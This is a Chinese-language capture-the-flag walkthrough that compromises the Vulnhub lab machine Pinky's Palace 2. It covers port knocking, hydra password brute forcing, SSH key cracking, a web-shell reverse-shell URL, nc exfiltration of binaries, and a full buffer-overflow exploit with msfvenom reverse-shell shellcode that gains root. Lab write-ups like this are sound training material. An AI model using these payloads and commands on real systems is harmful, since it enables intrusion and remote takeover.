[Vulnhub] Pinkys-Palace2 Ports-Knocking+ssh_crack+LFI+RE+Corn+RE&BOF

信息收集

IP Address	Opening Ports
192.168.8.108	TCP:80,4655,7654,31337

$ nmap -p- 192.168.8.108 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite

目录扫描

$ curl http://192.168.8.108 -I

# echo '192.168.8.108 pinkydb'>>/etc/hosts

pinky1337

$ gobuster dir -u "http://pinkydb" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

pinkydb

端口敲门

$ knock 192.168.8.108 7000 666 8890 -d 300 -v

$ nmap nmap -p- 192.168.8.108 --min-rate 1000 -sC -sV

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
|   2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
|   256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_  256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp  open  http    nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Pinkys Database
31337/tcp open  Elite?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|   GetRequest:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HTTP/1.0
|   HTTPOptions:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / HTTP/1.0
|   Help:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HELP
|   RTSPRequest:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / RTSP/1.0
|   SIPOptions:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.92%I=7%D=7/12%Time=66911572%P=x86_64-pc-linux-gnu%r(N
SF:ULL,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20i
SF:s\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.
SF:\n=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\
SF:x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\
SF:x20Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SIPOp
SF:tions,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x
SF:20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palac
SF:e\.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\r\n\r\n")%r(GenericLines,5D,"\[\+\]\x20Welcome\x20to\x20The\x20
SF:Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n
SF:\0into\x20Pinky's\x20Palace\.\n=>\x20\0\r\n\r\n")%r(HTTPOptions,6F,"\[\
SF:+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x
SF:20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0O
SF:PTIONS\x20/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,6F,"\[\+\]\x20Welcome\
SF:x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20o
SF:ur\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPTIONS\x20/\x20
SF:RTSP/1\.0\r\n\r\n")%r(RPCCheck,5A,"\[\+\]\x20Welcome\x20to\x20The\x20Da
SF:emon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0
SF:into\x20Pinky's\x20Palace\.\n=>\x20\0\x80")%r(DNSVersionBindReqTCP,59,"
SF:\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soo
SF:n\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20
SF:\0")%r(DNSStatusRequestTCP,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon
SF:\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into
SF:\x20Pinky's\x20Palace\.\n=>\x20\0")%r(Help,5F,"\[\+\]\x20Welcome\x20to\
SF:x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20
SF:backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0HELP\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://pinkydb:7654/login.php

admin
pinky
pinky1337

$ cewl pinkydb > password.txt

$ hydra -L username.txt -P password.txt pinkydb -s 7654 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid Username or Password"

username:pinky
password:Passione

SSH文件解密&SSH2JOHN

$ curl http://pinkydb:7654/credentialsdir1425364865/id_rsa

$ ssh2john ./id_rsa > crack.txt
$ john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

password:secretz101

SSH7.4存在用户枚举漏洞

$ python3 ssh_u.py 192.168.8.108 -p 4655 -w /usr/share/wordlists/rockyou.txt

$ ssh -i id_rsa stefano@192.168.8.108 -p 4655

权限提升:横向用户www-data

写入一句话木马进行文件包含

http://pinkydb:7654/pageegap.php?cmd=%2fbin%2fbash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3e%261%27&1337=/home/stefano/tools/1.php

权限提升:逆向qsub:横向用户demon

$ cd /home/stefano/tools

www-data@Pinkys-Palace:/home/stefano/tools$ cat qsub|nc 192.168.8.107 10034

引入了一个环境变量TERM作为密码

跟进send函数后,将我们的传递的参数作为/bin/echo参数执行

$ ./qsub ";/bin/sh;1"

password:xterm-256color

通过pspy32进一步验证的确是一个定时任务

$ vi /usr/local/bin/backup.sh

等待一分钟左右

同样方式SSH

$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K/go+OybYs5gwGEBE maptnh@maptnh'>authorized_keys

$ ssh -i ~/.ssh/id_ed25519 demon@192.168.8.108 -p 4655

权限提升:逆向Panel:Root&BOF

demon@Pinkys-Palace:/daemon$ cat panel | nc 192.168.8.107 10035

很明显这是一个套接字在端口31337

$ ps aux | grep panel

恰巧Root用户正在运行这个程序在端口31337

$ gdb -q ./panel

中途可能会出现进程卡死端口占用使用命令结束

pkill panel

gdb-peda$ pattern_create 1000

gdb-peda$ run

确认缓冲区大小

$ echo -e 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x' |nc 127.0.0.1 31337

gdb-peda$ pattern_offset jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAAT

通过继续确认,由此确认缓冲区大小为120字节,我们有空间将最多120字节的shellcode注入到堆栈中

gdb-peda$ jmpcall

由于这只有3个字节，可以使用溢出中的返回地址来寻址它:
0x400cfb : call rsp

\xfb\x0c\x40\x00

$ msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=192.168.8.107 LPORT=10035 -b '\x00' -f python

#! /usr/bin/python3
from pwn import *
import sys

buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\xd3\xd9\x2d\x43\xb0\xa3\x04"
buf += b"\x5f\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\xb9\xf0\x75\xda\xda\xa1\x5b\x35\xd2\x87\x22\x46\xf8"
buf += b"\x34\x4c\xe6\xd1\xd9\x0a\x70\x70\x0b\x0c\x34\x82\x91"
buf += b"\xa4\xa5\xda\xb3\x5e\x35\xf9\x81\x22\x46\xda\xa0\x5a"
buf += b"\x17\x2c\x17\x47\x62\xe8\xac\x01\x2a\x25\xb3\x16\x1b"
buf += b"\x29\xeb\xbf\x70\xb1\xb0\x43\x6c\xc3\xcb\x04\x0c\x9b"
buf += b"\x50\xca\x11\xe7\xeb\x8d\xb9\xdc\xdc\x2d\x43\xb0\xa3"
buf += b"\x04\x5f\x90"
ret = p64(0x400cfb)
payload = buf + ret
r = remote(sys.argv[1],31337)
r.recv()
r.send(payload)
print("[Done]")

$ python3 exp.py 127.0.0.1

$ python3 exp.py 192.168.8.108

root@Pinkys-Palace:/root# cat /root/root.txt

2208f787fcc6433b4798d2189af7424d